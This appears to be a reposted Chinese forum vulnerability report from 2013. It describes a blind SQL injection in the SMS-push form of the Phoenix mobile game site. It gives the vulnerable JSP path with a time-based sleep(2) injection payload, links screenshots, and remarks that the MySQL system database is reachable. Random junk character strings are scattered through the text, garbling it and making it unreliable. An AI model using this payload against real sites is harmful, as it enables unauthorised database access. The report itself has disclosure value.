简要描述:
" X5 J+ R/ }/ t$ s; w/ ^$ y凤凰手机游戏网,在填写手机号码发送push连接的地方存在sql盲注漏洞。/ g8 T3 @: R& K$ g
+ E1 s9 @4 Y- N* v% `$ y x详细说明:
1 |- G/ Q/ m! x' e0 ~ I存在SQL盲注url:
/ s* d! r9 x7 j0 Gfenghuang/game/game_send_sms.jsp?gameid=130221346000%27%20and%20sleep%282%29%3d%27&mo=1+ ?" _9 |# Q& X5 r6 J
http://www.myhack58.com/Article/UploadPic/2013-4/2013411254849748.png
# |8 Y: Q" S2 G `# @http://www.myhack58.com/Article/UploadPic/2013-4/20134112545369314.png
6 R7 J9 ?' d$ h- j6 \. t5 ihttp://www.myhack58.com/Article/UploadPic/2013-4/20134112565766695.jpg6 S0 Z( D+ L# j
' I5 m) H) } x" h# v8 `
能看到mysql系统数据库,看来user权限应该很高的。。 | 
发表于 2013-4-4 17:34:29
收藏
支持
反对